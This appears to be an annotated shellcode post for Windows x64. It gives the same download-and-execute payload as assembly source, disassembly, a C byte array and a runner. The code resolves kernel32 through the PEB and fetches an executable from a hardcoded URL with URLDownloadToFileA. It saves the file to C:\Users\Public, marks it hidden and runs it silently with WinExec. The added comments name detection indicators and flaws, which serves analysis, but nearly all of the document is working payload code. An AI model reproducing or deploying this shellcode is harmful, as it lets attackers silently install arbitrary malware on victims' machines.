Windows x64 - Download & Execute Shellcode (358 bytes)


Windows x64 Download & Execute Shellcode (358 bytes). Author: Roziul Hasan Khan Shifat. Tested on Windows 7 x64 Professional. Email: [email protected]. Shellcode that downloads a file from a URL fixed in the code to a fixed path, sets the hidden attribute on it, and executes it. It locates kernel32.dll through the PEB, loads urlmon.dll, and embeds the file path and the URL as plain strings.

Code
/*

	# Title : Windows x64 Download+Execute Shellcode
	# Author : Roziul Hasan Khan Shifat
	# Date : 24-11-2016
	# size : 358 bytes
	# Tested on : Windows 7 x64 Professional
	# Email : [email protected]  




*/




/*


section .text
	global _start
_start:


;-----------------------------
; Analysis notes (NASM, Intel syntax; Windows x64 calling convention:
; args in rcx, rdx, r8, r9, then the stack; the caller reserves 32 bytes
; of shadow space below the return address).
; Register roles for the whole routine:
;   r14 = 88-byte scratch area on the stack holding every string passed
;         to an API (DLL name, export name, then the drop path at r14+0
;         and the URL at r14+25)
;   rdi = kernel32.dll image base
;   rsi = kernel32 export AddressOfFunctions table (after the PE walk)
;   rbx = current call target
;   r15 = resolved URLDownloadToFileA
; Everything a defender can key on is stored in clear: the DLL and export
; names, the drop path, the URL, the hidden attribute and the WinExec call.

sub rsp,88                       ;reserve the string buffer ...

lea r14,[rsp]                    ;... and keep its address in a callee-saved register
sub rsp,88                       ;space below it for call frames (keeps callees' shadow space off the buffer)


;------------------------------------------------
; Locate kernel32.dll without imports: TEB -> PEB -> Ldr -> module list.


xor rdx,rdx
mov rax,[gs:rdx+0x60] ;PEB (gs:[0x60] = TEB.ProcessEnvironmentBlock)
mov rsi,[rax+0x18] ;PEB.Ldr
mov rsi,[rsi+0x10] ;Ldr->InLoadOrderModuleList.Flink = first entry (the exe itself).
                   ;The original comment said InMemOrder; the +0x30 DllBase read below only
                   ;fits the in-load-order links (from the in-memory-order links DllBase is +0x20).
lodsq              ;rax = entry->Flink = second entry (ntdll on the tested build)
mov rsi,[rax]      ;rsi = third entry
mov rdi,[rsi+0x30] ;kernel32.dll base address (LDR_DATA_TABLE_ENTRY.DllBase); assumes the
                   ;usual exe, ntdll, kernel32 load order

;---------------------------------------------------
; Walk kernel32's export directory to reach its function-address table.


mov ebx,[rdi+0x3c] ;e_lfanew: RVA of the NT headers (misspelled "elf_anew" in the original)
add rbx,rdi
mov dl,0x88
mov ebx,[rbx+rdx]  ;NT headers + 0x88 = DataDirectory[EXPORT].VirtualAddress (PE32+ layout)
add rbx,rdi        ;rbx = IMAGE_EXPORT_DIRECTORY

mov esi,[rbx+0x1c] ;+0x1c = AddressOfFunctions RVA
add rsi,rdi        ;rsi = table of function RVAs, indexed by (ordinal - Base) below
;--------------------------------------------------
; Exports are picked by fixed table index, never by name, so the indices
; 831, 586, 1131, 1314 and 296 are bound to the kernel32 build this was
; tested on (Windows 7 x64 per the header) and may not match other builds.

;loading urlmon.dll

mov dx,831          ;index 831: called with only a DLL name, so presumably LoadLibraryA (not named on the page)
mov ebx,[rsi+rdx*4]
add rbx,rdi

xor rdx,rdx         ;dl = 0 doubles as the string terminator below


mov [r14],dword 'urlm'
mov [r14+4],word 'on'
mov [r14+6],byte dl   ;"urlmon" NUL-terminated at r14

lea rcx,[r14]         ;rcx = library name



call rbx              ;rax = module handle of urlmon.dll (return value is not checked)


mov dx,586            ;index 586: called with (module handle, name), so presumably GetProcAddress
mov ebx,[rsi+rdx*4]
add rbx,rdi

xor rdx,rdx

mov rcx,'URLDownl'
mov [r14],rcx
mov rcx,'oadToFil'
mov [r14+8],rcx
mov [r14+16],word 'eA'
mov [r14+18],byte dl    ;"URLDownloadToFileA" NUL-terminated at r14


lea rdx,[r14]           ;rdx = export name
mov rcx,rax             ;rcx = urlmon handle from the previous call

call rbx
;;;;;;;;;;;;;;;;;;;;;;-------------------------------------

mov r15,rax             ;r15 = URLDownloadToFileA (callee-saved, survives the later calls)

;------------------------------------------------
;save as 'C:\\Users\\Public\\p.exe' length: 24+1
; NASM does not process escapes in single-quoted strings, so the buffer really
; holds doubled backslashes (24 bytes; note the 5c 5c pairs in the disassembly)
; and the path relies on Win32 tolerating repeated separators. The Public
; profile is writable by any local user, which makes it a drop location worth
; monitoring.

mov rax,'C:\\User'
mov [r14],rax
mov rax,'s\\Publi'
mov [r14+8],rax
mov rax,'c\\p.exe'
mov [r14+16],rax

xor rdx,rdx
mov [r14+24],byte dl   ;terminator; rdx stays 0 and terminates the URL as well


;----------------------------------------


lea rcx,[r14+25]       ;rcx = start of the URL, placed directly after the path


;url "http://192.168.10.129/pl.exe" length: 28+1
; Private (RFC 1918) address from the original post, 28 bytes + NUL at
; r14+25..r14+53, still inside the 88-byte buffer.

mov rax,'http://1'
mov [rcx],rax
mov rax,'92.168.1'
mov [rcx+8],rax
mov rax,'0.129/pl'
mov [rcx+16],rax
mov [rcx+24],dword '.exe'
mov [rcx+28],byte dl


;---------------------------------------------------

sub rsp,88             ;fresh frame: 32-byte shadow space plus the stack slot for the 5th argument


download:
xor rcx,rcx            ;pCaller = NULL
lea rdx,[r14+25]       ;szURL
lea r8,[r14]           ;szFileName = the drop path
xor r9,r9              ;dwReserved = 0
mov [rsp+32],r9        ;lpfnCB = NULL, 5th argument, first stack slot above the shadow space

call r15               ;URLDownloadToFileA(...)

xor rdx,rdx
cmp rax,rdx
jnz download           ;retry until it returns S_OK (0); there is no retry limit, so an
                       ;unreachable host keeps this loop re-issuing the HTTP request



;------------------------------------------------
sub rsp,88             ;another 88-byte frame; the earlier ones are never released (one add at the end)
;-----------------------------------------------
;hiding file




mov dx,1131
mov ebx,[rsi+rdx*4]
add rbx,rdi ;SetFileAttributesA()


lea rcx,[r14]          ;lpFileName = drop path
xor rdx,rdx
mov dl,2               ;dwFileAttributes = FILE_ATTRIBUTE_HIDDEN (2)

call rbx

;------------------------------------
;executing file
xor rdx,rdx
mov dx,1314
mov ebx,[rsi+rdx*4]
add rbx,rdi ;WinExec()


lea rcx,[r14]          ;lpCmdLine = drop path

xor rdx,rdx            ;uCmdShow = 0 = SW_HIDE (no visible window)



call rbx


;------------------------------
xor rdx,rdx
mov dx,296
mov ebx,[rsi+rdx*4]
add rbx,rdi            ;index 296, called with a single zero argument: presumably ExitProcess(0)

;---------------------------------------

;if you use this shellcode for PE injection, don't forget to free the allocated stack space

add rsp,88             ;releases only the last frame; the final call is not expected to return
xor rcx,rcx
call rbx


*/

/*


Disassembly of section .text:

0000000000000000 <_start>:
   0:	48 83 ec 58          	sub    $0x58,%rsp
   4:	4c 8d 34 24          	lea    (%rsp),%r14
   8:	48 83 ec 58          	sub    $0x58,%rsp
   c:	48 31 d2             	xor    %rdx,%rdx
   f:	65 48 8b 42 60       	mov    %gs:0x60(%rdx),%rax
  14:	48 8b 70 18          	mov    0x18(%rax),%rsi
  18:	48 8b 76 10          	mov    0x10(%rsi),%rsi
  1c:	48 ad                	lods   %ds:(%rsi),%rax
  1e:	48 8b 30             	mov    (%rax),%rsi
  21:	48 8b 7e 30          	mov    0x30(%rsi),%rdi
  25:	8b 5f 3c             	mov    0x3c(%rdi),%ebx
  28:	48 01 fb             	add    %rdi,%rbx
  2b:	b2 88                	mov    $0x88,%dl
  2d:	8b 1c 13             	mov    (%rbx,%rdx,1),%ebx
  30:	48 01 fb             	add    %rdi,%rbx
  33:	8b 73 1c             	mov    0x1c(%rbx),%esi
  36:	48 01 fe             	add    %rdi,%rsi
  39:	66 ba 3f 03          	mov    $0x33f,%dx
  3d:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
  40:	48 01 fb             	add    %rdi,%rbx
  43:	48 31 d2             	xor    %rdx,%rdx
  46:	41 c7 06 75 72 6c 6d 	movl   $0x6d6c7275,(%r14)
  4d:	66 41 c7 46 04 6f 6e 	movw   $0x6e6f,0x4(%r14)
  54:	41 88 56 06          	mov    %dl,0x6(%r14)
  58:	49 8d 0e             	lea    (%r14),%rcx
  5b:	ff d3                	callq  *%rbx
  5d:	66 ba 4a 02          	mov    $0x24a,%dx
  61:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
  64:	48 01 fb             	add    %rdi,%rbx
  67:	48 31 d2             	xor    %rdx,%rdx
  6a:	48 b9 55 52 4c 44 6f 	movabs $0x6c6e776f444c5255,%rcx
  71:	77 6e 6c 
  74:	49 89 0e             	mov    %rcx,(%r14)
  77:	48 b9 6f 61 64 54 6f 	movabs $0x6c69466f5464616f,%rcx
  7e:	46 69 6c 
  81:	49 89 4e 08          	mov    %rcx,0x8(%r14)
  85:	66 41 c7 46 10 65 41 	movw   $0x4165,0x10(%r14)
  8c:	41 88 56 12          	mov    %dl,0x12(%r14)
  90:	49 8d 16             	lea    (%r14),%rdx
  93:	48 89 c1             	mov    %rax,%rcx
  96:	ff d3                	callq  *%rbx
  98:	49 89 c7             	mov    %rax,%r15
  9b:	48 b8 43 3a 5c 5c 55 	movabs $0x726573555c5c3a43,%rax
  a2:	73 65 72 
  a5:	49 89 06             	mov    %rax,(%r14)
  a8:	48 b8 73 5c 5c 50 75 	movabs $0x696c6275505c5c73,%rax
  af:	62 6c 69 
  b2:	49 89 46 08          	mov    %rax,0x8(%r14)
  b6:	48 b8 63 5c 5c 70 2e 	movabs $0x6578652e705c5c63,%rax
  bd:	65 78 65 
  c0:	49 89 46 10          	mov    %rax,0x10(%r14)
  c4:	48 31 d2             	xor    %rdx,%rdx
  c7:	41 88 56 18          	mov    %dl,0x18(%r14)
  cb:	49 8d 4e 19          	lea    0x19(%r14),%rcx
  cf:	48 b8 68 74 74 70 3a 	movabs $0x312f2f3a70747468,%rax
  d6:	2f 2f 31 
  d9:	48 89 01             	mov    %rax,(%rcx)
  dc:	48 b8 39 32 2e 31 36 	movabs $0x312e3836312e3239,%rax
  e3:	38 2e 31 
  e6:	48 89 41 08          	mov    %rax,0x8(%rcx)
  ea:	48 b8 30 2e 31 32 39 	movabs $0x6c702f3932312e30,%rax
  f1:	2f 70 6c 
  f4:	48 89 41 10          	mov    %rax,0x10(%rcx)
  f8:	c7 41 18 2e 65 78 65 	movl   $0x6578652e,0x18(%rcx)
  ff:	88 51 1c             	mov    %dl,0x1c(%rcx)
 102:	48 83 ec 58          	sub    $0x58,%rsp

0000000000000106 <download>:
 106:	48 31 c9             	xor    %rcx,%rcx
 109:	49 8d 56 19          	lea    0x19(%r14),%rdx
 10d:	4d 8d 06             	lea    (%r14),%r8
 110:	4d 31 c9             	xor    %r9,%r9
 113:	4c 89 4c 24 20       	mov    %r9,0x20(%rsp)
 118:	41 ff d7             	callq  *%r15
 11b:	48 31 d2             	xor    %rdx,%rdx
 11e:	48 39 d0             	cmp    %rdx,%rax
 121:	75 e3                	jne    106 <download>
 123:	48 83 ec 58          	sub    $0x58,%rsp
 127:	66 ba 6b 04          	mov    $0x46b,%dx
 12b:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 12e:	48 01 fb             	add    %rdi,%rbx
 131:	49 8d 0e             	lea    (%r14),%rcx
 134:	48 31 d2             	xor    %rdx,%rdx
 137:	b2 02                	mov    $0x2,%dl
 139:	ff d3                	callq  *%rbx
 13b:	48 31 d2             	xor    %rdx,%rdx
 13e:	66 ba 22 05          	mov    $0x522,%dx
 142:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 145:	48 01 fb             	add    %rdi,%rbx
 148:	49 8d 0e             	lea    (%r14),%rcx
 14b:	48 31 d2             	xor    %rdx,%rdx
 14e:	ff d3                	callq  *%rbx
 150:	48 31 d2             	xor    %rdx,%rdx
 153:	66 ba 28 01          	mov    $0x128,%dx
 157:	8b 1c 96             	mov    (%rsi,%rdx,4),%ebx
 15a:	48 01 fb             	add    %rdi,%rbx
 15d:	48 83 c4 58          	add    $0x58,%rsp
 161:	48 31 c9             	xor    %rcx,%rcx
 164:	ff d3                	callq  *%rbx

*/

#include<windows.h>
#include<stdio.h>
#include<string.h>


/* The 358 bytes of the listing above, taken verbatim from the objdump output.
   The drop path C:\\Users\\Public\\p.exe and the download URL sit in the blob
   as plain ASCII and are the simplest strings to match on. No byte is 0x00,
   which is what lets main() size the blob with strlen(). */
char shellcode[]=\

"\x48\x83\xec\x58\x4c\x8d\x34\x24\x48\x83\xec\x58\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x70\x18\x48\x8b\x76\x10\x48\xad\x48\x8b\x30\x48\x8b\x7e\x30\x8b\x5f\x3c\x48\x01\xfb\xb2\x88\x8b\x1c\x13\x48\x01\xfb\x8b\x73\x1c\x48\x01\xfe\x66\xba\x3f\x03\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x41\xc7\x06\x75\x72\x6c\x6d\x66\x41\xc7\x46\x04\x6f\x6e\x41\x88\x56\x06\x49\x8d\x0e\xff\xd3\x66\xba\x4a\x02\x8b\x1c\x96\x48\x01\xfb\x48\x31\xd2\x48\xb9\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x49\x89\x0e\x48\xb9\x6f\x61\x64\x54\x6f\x46\x69\x6c\x49\x89\x4e\x08\x66\x41\xc7\x46\x10\x65\x41\x41\x88\x56\x12\x49\x8d\x16\x48\x89\xc1\xff\xd3\x49\x89\xc7\x48\xb8\x43\x3a\x5c\x5c\x55\x73\x65\x72\x49\x89\x06\x48\xb8\x73\x5c\x5c\x50\x75\x62\x6c\x69\x49\x89\x46\x08\x48\xb8\x63\x5c\x5c\x70\x2e\x65\x78\x65\x49\x89\x46\x10\x48\x31\xd2\x41\x88\x56\x18\x49\x8d\x4e\x19\x48\xb8\x68\x74\x74\x70\x3a\x2f\x2f\x31\x48\x89\x01\x48\xb8\x39\x32\x2e\x31\x36\x38\x2e\x31\x48\x89\x41\x08\x48\xb8\x30\x2e\x31\x32\x39\x2f\x70\x6c\x48\x89\x41\x10\xc7\x41\x18\x2e\x65\x78\x65\x88\x51\x1c\x48\x83\xec\x58\x48\x31\xc9\x49\x8d\x56\x19\x4d\x8d\x06\x4d\x31\xc9\x4c\x89\x4c\x24\x20\x41\xff\xd7\x48\x31\xd2\x48\x39\xd0\x75\xe3\x48\x83\xec\x58\x66\xba\x6b\x04\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xb2\x02\xff\xd3\x48\x31\xd2\x66\xba\x22\x05\x8b\x1c\x96\x48\x01\xfb\x49\x8d\x0e\x48\x31\xd2\xff\xd3\x48\x31\xd2\x66\xba\x28\x01\x8b\x1c\x96\x48\x01\xfb\x48\x83\xc4\x58\x48\x31\xc9\xff\xd3";

/*
 * Test harness from the original post: runs the byte array above in place.
 * It does no validation of the blob; the notes below are what a reader
 * should know before reusing the pattern for analysis.
 */
int main()
{
int len=strlen(shellcode);            /* valid only because the blob holds no 0x00 byte (see the objdump output) */
DWORD l=0;                            /* receives the old protection; written by VirtualProtect, otherwise unused */
printf("shellcode length : %d\n",len);
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);  /* makes the .data page RWX (a pattern memory scanners commonly flag);
                                                             the return value is not checked, so a failure surfaces as a fault below */
(* (int(*)()) shellcode)();           /* jump into the blob; its last call passes 0 in rcx and is not expected to return */

return 0;                             /* reached only if the blob returns */

}
